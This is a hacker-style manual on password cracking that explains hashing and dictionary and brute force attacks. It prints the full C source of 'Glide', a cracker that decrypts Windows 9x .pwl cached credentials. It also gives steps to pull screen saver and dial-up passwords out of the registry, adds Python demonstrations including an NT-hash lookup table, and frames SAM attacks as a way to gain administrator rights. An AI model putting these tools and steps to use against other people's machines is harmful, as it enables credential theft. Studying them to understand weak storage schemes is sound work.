Password Cracking Decrypted
Everyone has come across the term 'password'. Ever wondered why passwords work and how they are cracked? This manual answers those questions and shows, with code, how password crackers actually do their job.
First of all, what exactly is a password? A password is best described as an authentication token: something only the rightful user is supposed to know. Passwords are used to ensure that only the people who have permission to see some data can get at it. You need one to read your Inbox, to dial up to your Internet Service Provider and, in some organisations, to start the system at all. In every case the Username and Password pair is what authenticates you: the username identifies the user, the password proves the identity, and for every username there is one password. Compare it with a lock and key: for every lock there is one key that opens it. The lock is the username and the key is the password, so a password matters as much as the key to your house.
Your house stays safe as long as you, the rightful owner, are the only one holding the key. Likewise the whole idea behind a password is that only the rightful owner knows it. Every day we hear about stolen passwords and computer break-ins, and very often the cause is a weak password that an attacker guessed. Keep the following guidelines in mind when choosing one:
1. Never make your password the same as your username.
2. Never use your own name, date of birth, spouse's name, pet's name, child's name and so on; these are the first things an attacker tries.
3. Never use an empty password (just pressing Enter at the prompt), which some people do out of laziness.
4. Choose something that is not a dictionary word and mixes letters and digits; if possible use both lower and upper case and symbols such as #, $, %, ^. A password like that is in no word list, so only a brute force cracker can find it, and brute force takes far too long once the password is reasonably long.
Weak passwords explain a large share of break-ins, but the real weak link in the authentication chain is the person. Most people pick passwords like the ones above, and those who pick good ones cannot remember them, so they write them on a piece of paper and stick it to the monitor. The classic places to look for a written-down password are under the keyboard, behind the computer case and along the edges of the monitor. If you want to keep your system secure, make the effort to memorise a strong password instead.
People who have to remember a large number of passwords for different services very often use the same one everywhere. Knowing a single password for one service therefore often unlocks several others.
Password Cracking
The most basic method of password cracking is guessing. It depends on luck, but it works surprisingly often; to guess well you first gather everything you can about the victim (see the guidelines above for the kind of detail that ends up in passwords). The most common and most successful method, however, is the use of password crackers. To understand what a password cracker is and how it works, you first need to understand how a person is authenticated.
When you create a new account (at registration, during setup, anywhere you enter a username and password for the first time) the username is stored in plaintext, but the password is not stored at all. Instead, what you typed is passed through a predefined one-way algorithm, a hash function, and only the result is written to disk. The next time you log in, the text you type is passed through the same algorithm and the result is compared with the stored value. If the two match you are authenticated, otherwise authentication fails.
The algorithm is one-way: there is no reverse algorithm that takes the stored value and gives back the original plaintext password. Older texts call the stored value an 'encrypted password'; strictly it is a hash, since nothing can decrypt it.
An example makes this clearer. Say your plaintext password is xyz123 and the algorithm turns it into 0101027AF (an invented value), which is what gets stored. Even if you obtain 0101027AF and know exactly which algorithm turned xyz123 into it, you cannot run the algorithm backwards to get xyz123 from 0101027AF.
When you type your password the computer does not display it but shows asterisks (********) so that someone shoulder surfing cannot read it; the text box is programmed that way. On most Unix systems you will not even see asterisks, and the cursor does not move, so an onlooker learns neither the password nor its length.
Password crackers come in two types: dictionary based and brute force.
Dictionary based crackers try every word in a predefined list. They are fast, and because most people choose the kind of password described above they succeed often, but they cannot find a password that is not in the list: one with digits or symbols mixed in, for instance, is simply never tried.
Brute force crackers try every combination of every key on the keyboard (symbols, digits, letters in both lower and upper case) up to some length. Because they consider every possible string they will find any password eventually, but the number of candidates grows exponentially with the length, so a long password over a large character set takes far too long to crack.
Now that you know the two main types, here is how both of them work. Because the stored value is a one-way hash, a cracker does not extract the password from the file. Instead it takes each candidate string, passes it through the same algorithm the system used, and compares the result with the stored value. When the two match, the cracker has found the password and prints it in plaintext.
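Added example, not from the original page: the store-and-compare scheme of the previous sections and both cracker types, in Python. It uses PBKDF2-HMAC-SHA256 with a per-user salt as the one-way algorithm (the text above does not name one; the 0101027AF value was only illustrative) and, on a constructed sample, cracks a weak password with a word list and with brute force, then shows why a character outside the attacker's alphabet defeats the brute force run.

```python
import hashlib
import hmac
import itertools
import os


def store_password(password: str, salt: bytes = None, iterations: int = 100_000) -> str:
    """Turn a plaintext password into the record that goes on disk.

    Only the salt, the iteration count and the one-way PBKDF2-HMAC-SHA256
    digest are stored; the plaintext never is.  A random per-user salt
    means two users with the same password get different records.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${digest.hex()}"


def verify_password(candidate: str, record: str) -> bool:
    """Re-run the same algorithm on the candidate and compare with the stored value."""
    iterations, salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison so the check itself does not leak a timing signal.
    return hmac.compare_digest(digest.hex(), digest_hex)


def dictionary_attack(record: str, wordlist):
    """Try every word in the list.  Returns (password or None, candidates tried)."""
    tried = 0
    for word in wordlist:
        tried += 1
        if verify_password(word, record):
            return word, tried
    return None, tried


def brute_force_attack(record: str, charset: str, max_len: int):
    """Try every string over `charset` up to `max_len` characters.

    Exhaustive, but the search space grows as len(charset) ** length,
    which is why length and a wide character set defeat it in practice.
    """
    tried = 0
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            tried += 1
            candidate = "".join(chars)
            if verify_password(candidate, record):
                return candidate, tried
    return None, tried


if __name__ == "__main__":
    # Constructed sample: a weak password that a tiny word list finds at once.
    rec = store_password("xyz123", iterations=1000)
    print(verify_password("xyz123", rec), verify_password("xyz124", rec))
    print(dictionary_attack(rec, ["password", "letmein", "xyz123"]))
    # A 3-character password over a 3-symbol alphabet falls to brute force ...
    print(brute_force_attack(store_password("ba1", iterations=1000), "ab1", 3))
    # ... but one containing a symbol outside the attacker's charset is never reached.
    print(brute_force_attack(store_password("a#b", iterations=1000), "ab1", 3))
```

The iteration count is deliberately low in the sample so the brute force run finishes quickly; in a real system the cost of the hash is part of the defence, since every candidate the cracker tries has to pay it.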
Cracking The Windows Login Password
The Windows 9x login password is protected by a very weak scheme and is quite easy to crack. Windows keeps each user's cached credentials (network share and dial-up passwords and the like) in a .pwl file in the c:\windows directory, encrypted under a key derived from the login password. The file is named after the user (USERNAME.PWL), so the username belonging to a file is obvious from its name. A typical .pwl file, taken from a Win98 machine running IE 5.0, looks like this:
###############CUT HERE##############
[binary dump of the .pwl file: a short header, long runs of 0xFF bytes, then two lines of unreadable encrypted data; not reproducible as text]
############CUT HERE#############
Reading the dump in the light of the cracker below: the first line is the file header, the long runs of 0xFF are unused slots in the resource index (Glide reads that table at offsets 0x108 to 0x207 and treats 0xFF as 'unused'), and everything from offset 0x208 on is encrypted data: first the user name, then a table of resource pointers, then the resources themselves. Staring at these bytes will not give you the plaintext, and Glide does not try to guess the password either. It exploits two things: every record in the file is XORed with the same keystream, and parts of the plaintext are predictable (the upper-cased user name at the start, and the resource pointer table, whose values follow from the layout of the file). XORing known plaintext back out of the ciphertext yields the keystream, and the keystream decrypts the stored resources. The cracker, Glide, is a small C program; its source is below. If you know C, study it and you will see exactly how a cracker of this kind works and how Windows protects the file.
*********************
Newbie Tip: Practically everything related to hacking (exploits, crackers, mail bombers) is written in either Perl or C. If you want to be taken seriously as a hacker you have to be able to program: without a sound knowledge of C (or C++) or Perl you cannot hack successfully. Almost every exploit on the net has an important part edited out or missing, without which it is useless, and many need changes before they run on your platform. Programming knowledge is what lets you do that.
********************
/* Glide: recovers keystream from the predictable parts of a Win95/98 .PWL
   file (the user name and the resource pointer table) and uses it to
   decrypt the cached credentials stored in the file.  Standard C headers
   only, so it builds with any modern compiler, not just the DOS one. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

unsigned char Data[100001];      /* the whole .pwl file */
unsigned char keystream[1001];   /* recovered keystream bytes */
int Rpoint[300];                 /* file offset of each resource */

int main(int argc, char *argv[]) {
    FILE *fd;
    int i, j, c;
    int size;
    int ch;
    char *name;
    int cracked;
    int sizemask;
    int maxr;
    int rsz;
    int pos;
    int Rall[300];               /* resource allocation table */

    if (argc < 2) {
        printf("usage: glide filename (username)\n");
        exit(1);
    }
    /* read PWL file, never past the end of the buffer */
    fd = fopen(argv[1], "rb");
    if (fd == NULL) {
        printf("can't open file %s\n", argv[1]);
        exit(1);
    }
    size = 0;
    while (size < (int)sizeof(Data) && (c = fgetc(fd)) != EOF) {
        Data[size++] = (unsigned char)c;
    }
    fclose(fd);
    if (size < 0x208 + 2) {
        printf("file too small to be a .pwl file\n");
        exit(1);
    }
    /* find username: defaults to the file name, which is USERNAME.PWL */
    name = argv[1];
    if (argc > 2) name = argv[2];
    printf("Username: %s\n", name);
    /* copy encrypted text into keystream */
    cracked = size - 0x0208;
    if (cracked < 0) cracked = 0;
    if (cracked > 1000) cracked = 1000;
    memcpy(keystream, Data + 0x208, cracked);
    /* generate up to 20 bytes of keystream: the first bytes of the
       encrypted data are the upper-cased user name, so XORing that known
       plaintext back out leaves the keystream */
    for (i = 0; i < 20; i++) {
        ch = toupper((unsigned char)name[i]);
        if (ch == 0) break;
        if (ch == '.') break;
        keystream[i] ^= (unsigned char)ch;
    }
    cracked = 20;
    /* find allocated resources */
    sizemask = keystream[0] + (keystream[1] << 8);
    printf("Sizemask: %04X\n", sizemask);
    for (i = 0; i < 256; i++) Rall[i] = 0;
    maxr = 0;
    for (i = 0x108; i < 0x208; i++) {
        if (Data[i] != 0xff) {
            Rall[Data[i]]++;
            if (Data[i] > maxr) maxr = Data[i];
        }
    }
    maxr = (((maxr / 16) + 1) * 16); /* resource pointer table size appears to be divisible by 16 */
    /* search for resources */
    Rpoint[0] = 0x0208 + 2 * maxr + 20 + 2; /* first resource */
    for (i = 0; i < maxr; i++) {
        /* find size of current resource */
        pos = Rpoint[i];
        if (pos + 1 >= size) {
            printf("resource table runs past end of file\n");
            exit(1);
        }
        rsz = Data[pos] + (Data[pos + 1] << 8);
        rsz ^= sizemask;
        printf("Analyzing block with size: %04x\t(%d:%d)\n", rsz, i, Rall[i]);
        if ((Rall[i] == 0) && (rsz != 0)) {
            printf("unused resource has nonzero size !!!\n");
            printf("If last line produced any : You may try to recover\n");
            printf("press y to attempt recovery\n");
            ch = getchar();
            if (ch != 'y') exit(0);
            rsz = 2;
            i -= 1;
        }
        pos += rsz;
        /* Resources have a tendency to have the wrong size for some reason */
        /* check for correct size, staying inside the file */
        if (i < maxr - 1) {
            while (pos + 3 < size && Data[pos + 3] != keystream[1]) {
                printf(":");
                pos += 2; /* very rude, may fail */
            }
        }
        pos += 2; /* include pointer in size */
        Rpoint[i + 1] = pos;
    }
    Rpoint[maxr] = size;
    /* insert table data into keystream: the resource pointers are stored
       encrypted at offset 20 and their plaintext values are now known */
    for (i = 0; i <= maxr; i++) {
        keystream[20 + 2 * i] ^= Rpoint[i] & 0x00ff;
        keystream[21 + 2 * i] ^= (Rpoint[i] >> 8) & 0x00ff;
    }
    cracked += maxr * 2 + 2;
    printf("%d bytes of keystream recovered\n", cracked);
    /* decrypt resources with the recovered keystream */
    for (i = 0; i < maxr; i++) {
        rsz = Rpoint[i + 1] - Rpoint[i];
        if (rsz > cracked) rsz = cracked;
        printf("Resource[%d] (%d)\n", i, rsz);
        for (j = 0; j < rsz; j++) printf("%c", Data[Rpoint[i] + j] ^ keystream[j]);
        printf("\n");
    }
    return 0;
}
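Added example, not part of the original page or of Glide: the principle the program above relies on, modelled in Python. The keystream here is SHA-256 in counter mode keyed by the password, a stand-in for the Windows algorithm rather than a reproduction of it, and the file layout is a constructed simplification (an encrypted user name followed by encrypted resources, all starting at keystream offset 0). What it shows is exactly Glide's two steps: XOR the known upper-cased user name out of the ciphertext to recover the first bytes of keystream, then extend the keystream with any further known plaintext so that the other records decrypt, without ever learning the password.

```python
import hashlib


def keystream(password: str, length: int) -> bytes:
    """Model keystream: SHA-256 in counter mode keyed by the password.

    Stands in for whatever Windows derives from the login password; the
    attack below never needs to know how this function works.
    """
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(password.encode() + counter.to_bytes(4, "little")).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def build_pwl_model(password: str, username: str, resources: list) -> dict:
    """Constructed stand-in for a .pwl file.

    The upper-cased user name and every resource are each encrypted from
    keystream offset 0.  Reusing one keystream for every record is the
    flaw Glide exploits.
    """
    longest = max(len(username), max(len(r) for r in resources))
    ks = keystream(password, longest)
    return {
        "user_field": xor_bytes(username.upper().encode(), ks),
        "resources": [xor_bytes(r, ks) for r in resources],
    }


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext XOR ciphertext gives the keystream for those positions."""
    return xor_bytes(ciphertext, known_plaintext)


def decrypt_prefixes(pwl: dict, ks: bytes) -> list:
    """Decrypt as much of every resource as the recovered keystream covers."""
    return [xor_bytes(r, ks) for r in pwl["resources"]]


if __name__ == "__main__":
    # Constructed sample file.  The attacker never learns "hunter2".
    pwl = build_pwl_model("hunter2", "alice",
                          [b"\\\\FILESRV\\PUBLIC:s3cret!", b"ISP dialup:letmein"])
    # Step 1: the user name is known (it is the file name), so the first
    # len("ALICE") bytes of keystream fall out immediately.
    ks = recover_keystream(pwl["user_field"], b"ALICE")
    print(decrypt_prefixes(pwl, ks))        # first 5 bytes of every resource
    # Step 2: any further known plaintext extends the keystream.  Here the
    # attacker knows the share entry (say it is their own), and the longer
    # keystream decrypts the dial-up entry completely.
    ks = recover_keystream(pwl["resources"][0], b"\\\\FILESRV\\PUBLIC:s3cret!")
    print(decrypt_prefixes(pwl, ks))
```

Glide's resource pointer table plays the role of the second known plaintext here: its values are fixed by the file layout, so once the program has walked the resources it knows the plaintext of that table and recovers a further 2*(maxr+1) bytes of keystream from it.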
Windows Screen Saver Password
This is an interesting hack and not many people know about it. It needs no canned hacking tool; we crack the password by hand. First, why would we need to crack the Windows screen saver password, and what does it restrict? If a screen saver is password protected then, once it has kicked in, you must enter the password to turn it off; until you do, you cannot do anything on the system (and CTRL+ALT+DEL does not help here). Windows stores the screen saver password in user.dat in the Windows directory or, if the system has several profiles, in user.dat under c:\windows\profiles\username. (On Windows 3.x it is stored in control.ini.) The user.dat file is one half of the Windows registry, so the screen saver password is in effect stored in the registry.
First you must make the file editable: right-click it and clear the Read Only attribute, otherwise you will not be able to save your changes. Note that user.dat is also hidden, and Windows keeps it open while it is running, so either edit it from DOS or use the Registry Editor (regedit) on the live system instead.
Then open the file in WordPad (any text editor will do except MS Word and Notepad) and search for the string ScreenSave_Data. After Data you will find an even number of hex digits; this is the screen saver password, stored as hex. Each pair of hex digits stands for one ASCII character of the password, so ten hex digits mean a five character password. To get the plaintext you only need to decode the hex pairs back into ASCII.
Internet Dial Up Password
Have you ever wondered where Windows keeps the Internet connection password when you tick 'Save Password' in the 'Connect To' dialog of a dial-up connection? It is kept in the registry under the following key:
HKEY_CURRENT_USER\RemoteAccess\Profile\<connection name>
Viewed in the Registry Editor the contents of this key are not readable. To make sense of it, and to be able to edit it, export the key to a .reg file and open that in Notepad. The password is stored as binary data and has to be converted to plaintext ASCII before you can read it.
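Added example (not from the original page): a small parser for the text export that regedit writes (REGEDIT4 format, with hex: values that wrap onto continuation lines), plus the hex-pair-to-ASCII decoding the screen saver section describes. The export, the key paths, the value names and their contents are constructed for the example; the exact value name under which a real dial-up profile keeps its saved password is not stated on the page and is an assumption here.

```python
import re

# Constructed export in the REGEDIT4 format Win9x regedit writes.  The
# "Password" value name and every value's contents are hypothetical.
SAMPLE_EXPORT = r'''REGEDIT4

[HKEY_CURRENT_USER\RemoteAccess\Profile\MyISP]
"User"="alice"
"Password"=hex:6c,65,74,6d,65,69,6e,\
  32,30,30,30,00
"Flags"=dword:00000004

[HKEY_CURRENT_USER\Control Panel\desktop]
"ScreenSaveActive"="1"
"ScreenSave_Data"="70617373"
'''


def decode_reg_value(raw: str):
    """Decode one right-hand side of a .reg line into str, int or bytes."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace('\\\\', '\\')
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    if raw.startswith("hex"):                       # hex:, hex(2):, hex(7): ...
        body = raw.split(":", 1)[1]
        return bytes(int(pair, 16) for pair in body.split(",") if pair.strip())
    return raw


def parse_reg_export(text: str) -> dict:
    """Return {key path: {value name: decoded value}} for a .reg export."""
    # Binary values wrap with a trailing backslash; glue the pieces first.
    text = re.sub(r",\\\r?\n\s*", ",", text)
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("REGEDIT") or line.startswith("Windows Registry"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if m and current is not None:
            keys[current][m.group(1)] = decode_reg_value(m.group(2))
    return keys


def binary_to_text(value: bytes) -> str:
    """Binary registry data that is really a C string: stop at the NUL, decode."""
    return value.split(b"\x00", 1)[0].decode("latin-1")


def screensaver_password(export: str) -> str:
    """ScreenSave_Data hex pairs decoded to ASCII, as the text above describes."""
    for values in parse_reg_export(export).values():
        if "ScreenSave_Data" in values:
            return bytes.fromhex(values["ScreenSave_Data"]).decode("latin-1")
    return ""


if __name__ == "__main__":
    keys = parse_reg_export(SAMPLE_EXPORT)
    profile = keys["HKEY_CURRENT_USER\\RemoteAccess\\Profile\\MyISP"]
    print(profile["User"], binary_to_text(profile["Password"]))
    print(screensaver_password(SAMPLE_EXPORT))
```

The same parser works on any key you export, which is the quickest way to look at binary registry data without squinting at the Registry Editor's hex view.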
Windows NT Password
You have seen how weak the Windows 9x scheme is and how easy it is to get past the Win9x login prompt; NT is a different story. First, how the password is stored: it is not encrypted but hashed, with the MD4 hash (the 'RSA hash function', MD4 being an RSA design) over the Unicode password, and the hash is then passed through a further obscuring step before it is stored in the SAM part of the NT registry. Along with the stronger storage technique NT ships utilities that make it more secure. Service Pack 2 added a DLL (passfilt.dll) that lets system administrators enforce that the passwords users choose are strong enough, and User Manager can be configured to require that passwords satisfy a given condition, for example a minimum length.
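Added example, not from the page: the NT hash computed in Python. The text says 'the RSA hash function'; concretely the NT hash is MD4 over the UTF-16LE encoding of the password, with no salt and no case folding, so the MD4 core (RFC 1320) is written out here rather than taken from hashlib, where MD4 is frequently disabled. The second half shows the consequence of the missing salt: one precomputed table of hashes serves every account, which is what makes a copied SAM so valuable. The lookup takes the hash after the SAM's obscuring step has been undone; that step is not shown.

```python
import struct


def md4(message: bytes) -> bytes:
    """MD4 (RFC 1320), written out because hashlib's md4 is often disabled."""
    mask = 0xFFFFFFFF

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & mask

    # Padding: 0x80, zeros to 56 mod 64, then the bit length as 64-bit LE.
    bit_length = len(message) * 8
    message += b"\x80"
    message += b"\x00" * ((56 - len(message) % 64) % 64)
    message += struct.pack("<Q", bit_length)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    order2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for offset in range(0, len(message), 64):
        x = struct.unpack("<16I", message[offset:offset + 64])
        a, b, c, d = a0, b0, c0, d0
        # Each round does 16 steps; rotating the registers after every step
        # reproduces the [ABCD], [DABC], [CDAB], [BCDA] pattern of the RFC.
        for i in range(16):
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + g(b, c, d) + x[order2[i]] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """The NT hash: MD4 over the UTF-16LE password, no salt, case preserved."""
    return md4(password.encode("utf-16-le")).hex()


def precompute(wordlist) -> dict:
    """Because there is no salt, one table of hash -> word serves every account."""
    return {nt_hash(word): word for word in wordlist}


def lookup(table: dict, stored_hash: str):
    """Match a hash pulled out of the SAM against the precomputed table."""
    return table.get(stored_hash.lower())


if __name__ == "__main__":
    print(nt_hash("password"))            # 8846f7eaee8fb117ad06bdd830b7586c
    table = precompute(["letmein", "password", "xyz123"])
    # Two accounts with the same password store the identical hash, so one
    # table lookup cracks both; a salted scheme would force two separate runs.
    print(lookup(table, nt_hash("password")), lookup(table, nt_hash("hunter2")))
```

Note the difference from the salted scheme earlier on this page: there, each stored record had to be attacked on its own; here the cost of building the table is paid once and every hash from every SAM is then a dictionary lookup.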
If you really want to learn all about NT security, read the NTBugtraq archives and join the mailing list. The NTBugtraq archive is the most comprehensive and exhaustive collection of NT security information; visit it at www.ntbugtraq.com
The site has everything you would want to know about NT, including the algorithm used to obscure the hashed password. There are various ways of getting administrator privileges on NT; I am not listing all of them here but only my favourite, SAM attacks. If you want to learn every way of breaking into NT, read the BugTraq archives. I will also be writing a manual on hacking NT quite soon.